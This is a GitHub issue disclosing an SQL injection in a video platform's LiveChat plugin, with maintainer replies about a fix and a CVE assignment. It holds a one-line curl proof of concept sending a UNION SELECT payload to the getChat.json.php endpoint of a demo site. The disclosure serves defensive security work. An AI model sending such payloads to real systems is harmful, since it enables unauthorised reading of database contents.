Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

SQL Injection in LiveChat plugin #2202

Closed
EgidioRomano opened this issue Oct 31, 2019 · 3 comments
Closed

SQL Injection in LiveChat plugin #2202

EgidioRomano opened this issue Oct 31, 2019 · 3 comments

Comments

@EgidioRomano
Copy link

@EgidioRomano EgidioRomano commented Oct 31, 2019

User input passed through the "live_stream_code" POST parameter to /plugin/LiveChat/getChat.json.php is not properly sanitized before being used to construct a SQL query. This can be exploited by malicious users to e.g. read sensitive data from the database through in-band SQL Injection attacks. Successful exploitation of this vulnerability requires the "Live Chat" plugin to be enabled.

Proof of Concept:

curl -X POST -d "live_stream_code=' UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,VERSION(),31,32,33,34,35,36#" https://demo.youphptube.com/plugin/LiveChat/getChat.json.php
DanielnetoDotCom pushed a commit that referenced this issue Oct 31, 2019
daniel daniel
@DanielnetoDotCom
Copy link
Member

@DanielnetoDotCom DanielnetoDotCom commented Oct 31, 2019

Thanks for noticing it, Security is the priority to us.

I fix was already sent.

@EgidioRomano
Copy link
Author

@EgidioRomano EgidioRomano commented Nov 2, 2019

CVE-2019-18662 has been assigned to this vulnerability.

@DanielnetoDotCom
Copy link
Member

@DanielnetoDotCom DanielnetoDotCom commented Nov 2, 2019

Hi, can you help me? what is CVE-2019-18662?

DanielnetoDotCom pushed a commit that referenced this issue Nov 2, 2019
daniel daniel
Add a better replace
DanielnetoDotCom pushed a commit that referenced this issue Nov 2, 2019
daniel daniel
Add a better replace
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Projects
None yet
Linked pull requests

Successfully merging a pull request may close this issue.

None yet
2 participants
You can’t perform that action at this time.